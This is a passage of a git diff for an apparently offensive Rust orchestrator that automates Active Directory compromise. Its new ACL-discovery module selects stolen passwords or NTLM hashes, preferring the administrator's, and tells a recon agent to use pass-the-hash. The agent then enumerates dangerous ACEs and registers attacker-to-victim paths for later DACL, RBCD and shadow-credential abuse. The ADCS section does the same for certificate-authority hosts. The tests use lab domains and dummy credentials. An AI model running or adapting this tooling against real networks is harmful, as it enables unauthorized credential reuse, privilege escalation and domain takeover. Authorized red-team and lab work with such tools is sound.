desc_lower.contains("domain admin")); let prefix = if is_critical { "CRITICAL: " } else { "" }; let mitre = extract_mitre_from_event(event); diff --git a/ares-cli/src/orchestrator/automation/acl.rs b/ares-cli/src/orchestrator/automation/acl.rs index 6571c836..97d8b6eb 100644 --- a/ares-cli/src/orchestrator/automation/acl.rs +++ b/ares-cli/src/orchestrator/automation/acl.rs @@ -174,6 +174,8 @@ mod tests { use super::*; use serde_json::json; + // --- extract_chain_steps --- + #[test] fn extract_chain_steps_from_array() { let chain = json!([{"source": "a"}, {"source": "b"}]); @@ -213,6 +215,8 @@ mod tests { assert!(extract_chain_steps(&chain).is_none()); } + // --- extract_source_user --- + #[test] fn extract_source_user_from_source_key() { let step = json!({"source": "admin"}); @@ -249,6 +253,8 @@ mod tests { assert_eq!(extract_source_user(&step), ""); } + // --- extract_source_domain --- + #[test] fn extract_source_domain_from_source_domain_key() { let step = json!({"source_domain": "contoso.local"}); @@ -279,6 +285,8 @@ mod tests { assert_eq!(extract_source_domain(&step), ""); } + // --- acl_step_dedup_key --- + #[test] fn acl_step_dedup_key_basic() { assert_eq!(acl_step_dedup_key(0, 0), "chain:0:step:0"); diff --git a/ares-cli/src/orchestrator/automation/acl_discovery.rs b/ares-cli/src/orchestrator/automation/acl_discovery.rs new file mode 100644 index 00000000..7a75814c --- /dev/null +++ b/ares-cli/src/orchestrator/automation/acl_discovery.rs @@ -0,0 +1,812 @@ +//! auto_acl_discovery -- discover ACL attack paths via targeted LDAP queries. +//! +//! Bridges the gap between BloodHound collection and ACL exploitation. +//! BloodHound collects data, but the ACL chain analysis must be extracted +//! and registered as discovered_vulnerabilities for `auto_dacl_abuse` to +//! exploit. +//! +//! This module dispatches `ldap_acl_enumeration` tasks per domain to: +//! 1. Query nTSecurityDescriptor on user/group/computer objects +//! 2. Identify dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, +//! GenericWrite, WriteOwner, Self-Membership) +//! 3. Register discovered ACL paths as vulnerabilities +//! +//! Interval: 60s (heavy LDAP query, don't run too frequently). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// The dangerous ACE types we want the recon agent to identify. +const DANGEROUS_ACE_TYPES: &[&str] = &[ + "GenericAll", + "GenericWrite", + "WriteDacl", + "WriteOwner", + "ForceChangePassword", + "Self-Membership", + "WriteMember", + "AllExtendedRights", + "WriteProperty", +]; + +/// Collect ACL discovery work items from current state. +/// +/// Pure logic extracted from `auto_acl_discovery` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_acl_discovery_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip dominated domains — once we own a domain there is nothing left + // for ACL escalation to discover there. Cross-trust ACL paths against + // un-owned domains still fire (they iterate other entries in + // all_domains_with_dcs). + if state.dominated_domains.contains(domain) { + continue; + } + // Use separate dedup keys for cred vs hash attempts so a failed + // password-based attempt (e.g., mislabeled credential domain) + // doesn't permanently block the hash-based path. + let dedup_key_cred = format!("acl_disc:{}:cred", domain.to_lowercase()); + let dedup_key_hash = format!("acl_disc:{}:hash", domain.to_lowercase()); + let dedup_key_trust = format!("acl_disc:{}:trust", domain.to_lowercase()); + + // Prefer same-domain cleartext cred, then fall back to trust-compatible + // cred (child→parent or cross-forest). Trust-based attempts use a + // separate dedup key so they don't block hash-based fallback. + let (cred, using_trust_cred) = if !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_cred) + { + let c = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + (c, false) + } else { + (None, false) + }; + let (cred, using_trust_cred) = + if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_trust) { + match state.find_trust_credential(domain) { + Some(c) => (Some(c), true), + None => (None, using_trust_cred), + } + } else { + (cred, using_trust_cred) + }; + + // Look for NTLM hash (PTH) — fires independently of cred attempt + let (ntlm_hash, ntlm_hash_username) = + if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_hash) { + state + .hashes + .iter() + .find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.username.to_lowercase() == "administrator" + }) + .or_else(|| { + state.hashes.iter().find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&h.username) + }) + }) + .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone()))) + .unwrap_or((None, None)) + } else { + (None, None) + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + continue; + } + + let dedup_key = if ntlm_hash.is_some() { + dedup_key_hash + } else if using_trust_cred { + dedup_key_trust + } else { + dedup_key_cred + }; + + // Collect known users in this domain to check ACEs against. + let domain_users: Vec = state + .credentials + .iter() + .filter(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .map(|c| c.username.clone()) + .collect(); + + items.push(AclDiscoveryWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain: domain.clone(), + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + known_users: domain_users, + ntlm_hash, + ntlm_hash_username, + }); + } + + items +} + +/// Dispatches LDAP ACE enumeration per domain to discover ACL attack paths. +/// Only runs after BloodHound collection has been dispatched (to avoid +/// duplicating effort). +pub async fn auto_acl_discovery(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + info!("auto_acl_discovery: spawned, waiting 45s for initial recon"); + + // Wait for initial recon to populate domain controllers. + tokio::time::sleep(Duration::from_secs(45)).await; + + info!("auto_acl_discovery: initial wait complete, entering main loop"); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("acl_discovery") { + debug!("auto_acl_discovery: technique not allowed"); + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + let dcs = state.all_domains_with_dcs(); + let creds = state.credentials.len(); + let hashes = state.hashes.len(); + info!( + dc_count = dcs.len(), + creds, hashes, "auto_acl_discovery: tick" + ); + collect_acl_discovery_work(&state) + }; + + if work.is_empty() { + debug!("auto_acl_discovery: no work items"); + } else { + info!( + count = work.len(), + "auto_acl_discovery: work items collected" + ); + } + + for item in work { + // When PTH hash is available, use the hash user's identity for the target domain + let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() { + ( + item.ntlm_hash_username + .clone() + .unwrap_or_else(|| item.credential.username.clone()), + String::new(), + item.domain.clone(), + ) + } else { + ( + item.credential.username.clone(), + item.credential.password.clone(), + item.credential.domain.clone(), + ) + }; + let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_acl_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, + }, + "ace_types": DANGEROUS_ACE_TYPES, + "known_users": item.known_users, + "instructions": concat!( + "Enumerate ACL attack paths in this domain.\n\n", + "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ", + "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n", + " - Use ldap_search with the hash if it accepts one, OR\n", + " - Use rpcclient_command with the hash parameter to query DACLs via RPC.\n\n", + "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain, ", + "you MUST pass bind_domain= to ldap_search. ", + "Check the 'bind_domain' field in the task payload — if present, always pass it ", + "to ldap_search so the LDAP bind uses user@bind_domain.\n\n", + "If a password IS provided, use ldap_search with filter ", + "'(objectCategory=*)' and request the nTSecurityDescriptor attribute.\n\n", + "For each dangerous ACE found (GenericAll, WriteDacl, ForceChangePassword, ", + "GenericWrite, WriteOwner, Self-Membership on users/groups), register it as ", + "a vulnerability with EXACTLY these fields:\n", + " vuln_type: lowercase ACE type (e.g. 'forcechangepassword', 'genericall', ", + "'genericwrite', 'writedacl', 'writeowner', 'self_membership')\n", + " source: the user/group that HAS the permission (attacker)\n", + " target: the user/group/computer that is the TARGET (victim)\n", + " target_type: 'User', 'Group', or 'Computer'\n", + " domain: the domain where this ACE exists\n", + " source_domain: the domain of the source principal\n", + "Focus on ACEs where the source is a user we have credentials for.\n\n", + "IMPORTANT: Include ALL users discovered in the discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"acl_discovery\"}" + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + if let Some(ref hash) = item.ntlm_hash { + payload["ntlm_hash"] = json!(hash); + } + if let Some(ref user) = item.ntlm_hash_username { + payload["hash_username"] = json!(user); + } + + // ACL discovery is high-priority — it gates RBCD, shadow creds, + // and DACL abuse exploitation paths. Use priority 2 to compete + // with credential_access tasks rather than sitting behind them. + let priority = 2; + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + known_users = item.known_users.len(), + "ACL discovery dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ACL_DISCOVERY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ACL_DISCOVERY, &item.dedup_key) + .await; + } + Ok(None) => { + // Don't mark dedup on defer — the deferred queue will + // retry and we need the work item to remain eligible in + // case the deferred task never dispatches. Duplicate + // enqueues to the deferred queue are harmless (it dedupes + // by payload hash). + debug!(domain = %item.domain, "ACL discovery deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch ACL discovery"); + } + } + } + } +} + +struct AclDiscoveryWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + known_users: Vec, + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::Credential; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key_cred = format!("acl_disc:{}:cred", "contoso.local"); + let key_hash = format!("acl_disc:{}:hash", "contoso.local"); + assert_eq!(key_cred, "acl_disc:contoso.local:cred"); + assert_eq!(key_hash, "acl_disc:contoso.local:hash"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ACL_DISCOVERY, "acl_discovery"); + } + + #[test] + fn dangerous_ace_types_not_empty() { + assert!(!DANGEROUS_ACE_TYPES.is_empty()); + } + + #[test] + fn dangerous_ace_types_contains_key_types() { + assert!(DANGEROUS_ACE_TYPES.contains(&"GenericAll")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteDacl")); + assert!(DANGEROUS_ACE_TYPES.contains(&"ForceChangePassword")); + assert!(DANGEROUS_ACE_TYPES.contains(&"GenericWrite")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteOwner")); + assert!(DANGEROUS_ACE_TYPES.contains(&"Self-Membership")); + } + + #[test] + fn dangerous_ace_types_count() { + assert_eq!(DANGEROUS_ACE_TYPES.len(), 9); + } + + #[test] + fn dangerous_ace_types_includes_write_property() { + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteProperty")); + assert!(DANGEROUS_ACE_TYPES.contains(&"AllExtendedRights")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteMember")); + } + + #[test] + fn dangerous_ace_types_no_duplicates() { + let mut seen = std::collections::HashSet::new(); + for ace in DANGEROUS_ACE_TYPES { + assert!(seen.insert(*ace), "Duplicate ACE type: {ace}"); + } + } + + #[test] + fn dedup_key_case_normalized() { + let key1 = format!("acl_disc:{}", "CONTOSO.LOCAL".to_lowercase()); + let key2 = format!("acl_disc:{}", "contoso.local"); + assert_eq!(key1, key2); + } + + #[test] + fn acl_discovery_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_acl_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + "ace_types": DANGEROUS_ACE_TYPES, + "known_users": ["admin", "jdoe"], + }); + assert_eq!(payload["technique"], "ldap_acl_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + let ace_types = payload["ace_types"].as_array().unwrap(); + assert_eq!(ace_types.len(), 9); + } + + #[test] + fn credential_domain_preference() { + // Same-domain credential is preferred + let domain = "contoso.local"; + let cred_same = "contoso.local"; + let cred_other = "fabrikam.local"; + assert_eq!(cred_same.to_lowercase(), domain.to_lowercase()); + assert_ne!(cred_other.to_lowercase(), domain.to_lowercase()); + } + + #[test] + fn known_users_collection() { + let credentials = [ + ("admin", "contoso.local"), + ("jdoe", "contoso.local"), + ("admin", "fabrikam.local"), + ]; + let domain = "contoso.local"; + let domain_users: Vec<&str> = credentials + .iter() + .filter(|(_, d)| d.to_lowercase() == domain.to_lowercase()) + .map(|(u, _)| *u) + .collect(); + assert_eq!(domain_users.len(), 2); + assert!(domain_users.contains(&"admin")); + assert!(domain_users.contains(&"jdoe")); + } + + #[test] + fn acl_discovery_work_fields() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = AclDiscoveryWork { + dedup_key: "acl_disc:contoso.local:cred".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + known_users: vec!["admin".into(), "jdoe".into()], + ntlm_hash: None, + ntlm_hash_username: None, + }; + assert_eq!(work.known_users.len(), 2); + assert_eq!(work.domain, "contoso.local"); + } + + // --- collect_acl_discovery_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + assert!(work[0].known_users.contains(&"admin".to_string())); + } + + #[test] + fn collect_multiple_domains_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_but_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:trust".into()); + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Add cross-domain cred first, then same-domain cred + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_cross_domain_cred_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only a fabrikam credential available for contoso DC — should NOT fall back + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 0, "cross-domain cred should not produce work"); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Credential with empty password + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_empty_password_uses_next() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("nopw", "", "contoso.local")); + state + .credentials + .push(make_credential("haspw", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "haspw"); + } + + #[test] + fn collect_known_users_only_from_same_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("jdoe", "Pass!456", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].known_users.len(), 2); + assert!(work[0].known_users.contains(&"admin".to_string())); + assert!(work[0].known_users.contains(&"jdoe".to_string())); + assert!(!work[0].known_users.contains(&"crossuser".to_string())); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred"); + } + + #[test] + fn collect_all_empty_password_creds_skips_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("user1", "", "contoso.local")); + state + .credentials + .push(make_credential("user2", "", "fabrikam.local")); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_same_domain_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + // No same-domain cred (quarantined) and no hash → skip + let work = collect_acl_discovery_work(&state); + assert_eq!( + work.len(), + 0, + "quarantined same-domain cred should not fall back to cross-domain" + ); + } + + #[test] + fn collect_all_credentials_quarantined_skips_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("user1", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("user2", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("user1", "contoso.local"); + state.quarantine_credential("user2", "fabrikam.local"); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_case_insensitive_domain_matching_for_creds() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "Contoso.Local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + // Should match via case-insensitive comparison + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "Contoso.Local"); + } + + #[test] + fn collect_known_users_includes_empty_password_users() { + // known_users collects ALL creds for the domain, even ones with empty passwords + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("nopw_user", "", "contoso.local")); + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + // Both users should appear in known_users (useful for ACE checking) + assert_eq!(work[0].known_users.len(), 2); + assert!(work[0].known_users.contains(&"admin".to_string())); + assert!(work[0].known_users.contains(&"nopw_user".to_string())); + } +} diff --git a/ares-cli/src/orchestrator/automation/adcs.rs b/ares-cli/src/orchestrator/automation/adcs.rs index f46d6a06..da76ef19 100644 --- a/ares-cli/src/orchestrator/automation/adcs.rs +++ b/ares-cli/src/orchestrator/automation/adcs.rs @@ -17,6 +17,230 @@ fn extract_domain_from_fqdn(fqdn: &str) -> Option { .map(|(_, d)| d.to_string()) } +/// Work item for ADCS enumeration. +struct AdcsWork { + host_ip: String, + /// Auth-and-identity dedup key + /// (e.g. `"192.168.58.10:cred:jdoe@contoso.local"` or `"…:hash:admin@…"`). + /// Including the credential identity prevents one wrong-domain attempt + /// from permanently locking a CA host against later, possibly-correct creds. + dedup_key: String, + dc_ip: Option, + domain: String, + credential: ares_core::models::Credential, + /// NTLM hash for pass-the-hash authentication (when no cleartext cred available). + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +/// Dedup key for a cred-based certipy_find attempt. +/// Format: `{host}:cred:{username}@{domain}` (lowercased identity). +pub(crate) fn dedup_key_cred(host: &str, cred: &ares_core::models::Credential) -> String { + format!( + "{}:cred:{}@{}", + host, + cred.username.to_lowercase(), + cred.domain.to_lowercase() + ) +} + +/// Dedup key for a hash-based certipy_find attempt. +/// Format: `{host}:hash:{username}@{domain}` (lowercased identity). +pub(crate) fn dedup_key_hash(host: &str, hash: &ares_core::models::Hash) -> String { + format!( + "{}:hash:{}@{}", + host, + hash.username.to_lowercase(), + hash.domain.to_lowercase() + ) +} + +/// Collect ADCS enumeration work items from current state. +/// +/// Pure logic extracted from `auto_adcs_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_adcs_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + state + .shares + .iter() + .filter(|s| s.name.to_lowercase() == "certenroll") + .filter_map(|s| { + let host_lower = s.host.to_lowercase(); + + let domain = state + .hosts + .iter() + .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower) + .and_then(|h| extract_domain_from_fqdn(&h.hostname)) + .and_then(|d| { + if state.domains.iter().any(|known| known.to_lowercase() == d) { + Some(d) + } else { + state + .domains + .iter() + .find(|known| d.ends_with(&format!(".{}", known.to_lowercase()))) + .or_else(|| { + state + .domains + .iter() + .find(|known| known.to_lowercase().ends_with(&format!(".{d}"))) + }) + .cloned() + .or(Some(d)) + } + }) + .or_else(|| state.domains.first().cloned())?; + + // Skip domains we already own — DA on a domain means we don't + // need to escalate via its CA. (We may still need ADCS against an + // un-owned domain via cross-trust, so this is per-domain not global.) + if state.dominated_domains.contains(&domain) { + return None; + } + + // Look up DC IP for this domain (certipy needs LDAP on a DC, not the CA host). + // Uses resolve_dc_ip() which falls back to scanning hosts list when + // domain_controllers doesn't have an entry. + let dc_ip = state.resolve_dc_ip(&domain); + + // certipy_find authenticates via LDAP bind to the target DC. + // NTLM/Kerberos bind succeeds within the same forest (same domain or + // parent/child/sibling) but fails 52e across a forest trust because + // the source principal does not exist in the target's domain and + // impacket cannot follow Kerberos cross-realm referrals. + // + // Restrict cred selection to the same forest as the target. If no + // same-forest cred exists, skip dispatch — other automations + // (foreign_group_enum, mssql_linked_server, golden_cert) handle + // the cross-forest foothold path that yields a same-forest cred. + // + // The dedup key includes the candidate credential's identity, so a + // failed first attempt with one cred does not block a later, possibly + // correct cred against the same CA host. + let domain_lower = domain.to_lowercase(); + let target_forest = state.forest_root_of(&domain_lower); + let cred = { + let mut candidates: Vec<&ares_core::models::Credential> = state + .credentials + .iter() + .filter(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain_lower + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .collect(); + candidates.extend(state.credentials.iter().filter(|c| { + let cd = c.domain.to_lowercase(); + !c.password.is_empty() + && cd != domain_lower + && state.forest_root_of(&cd) == target_forest + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + })); + candidates + .into_iter() + .find(|c| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_cred(&s.host, c))) + .cloned() + }; + + // Look for NTLM hash (PTH) only if cred path is exhausted (no + // unprocessed cred candidate exists). Same identity-aware dedup. + let hash_pick = if cred.is_none() { + let pred_admin_same = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty()) + && h.username.to_lowercase() == "administrator" + }; + let pred_any_same = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty()) + && !state.is_delegation_account(&h.username) + }; + let same_forest = |h: &&ares_core::models::Hash| -> bool { + let hd = h.domain.to_lowercase(); + !hd.is_empty() && state.forest_root_of(&hd) == target_forest + }; + let pred_admin_xdom = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && same_forest(h) + && h.username.to_lowercase() == "administrator" + }; + let pred_any_xdom = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && same_forest(h) + && !state.is_delegation_account(&h.username) + }; + + let mut candidates: Vec<&ares_core::models::Hash> = Vec::new(); + candidates.extend(state.hashes.iter().filter(pred_admin_same)); + candidates.extend(state.hashes.iter().filter(pred_any_same).filter(|h| { + h.username.to_lowercase() != "administrator" + || (h.domain.to_lowercase() != domain_lower && !h.domain.is_empty()) + })); + candidates.extend( + state.hashes.iter().filter(pred_admin_xdom).filter(|h| { + h.domain.to_lowercase() != domain_lower && 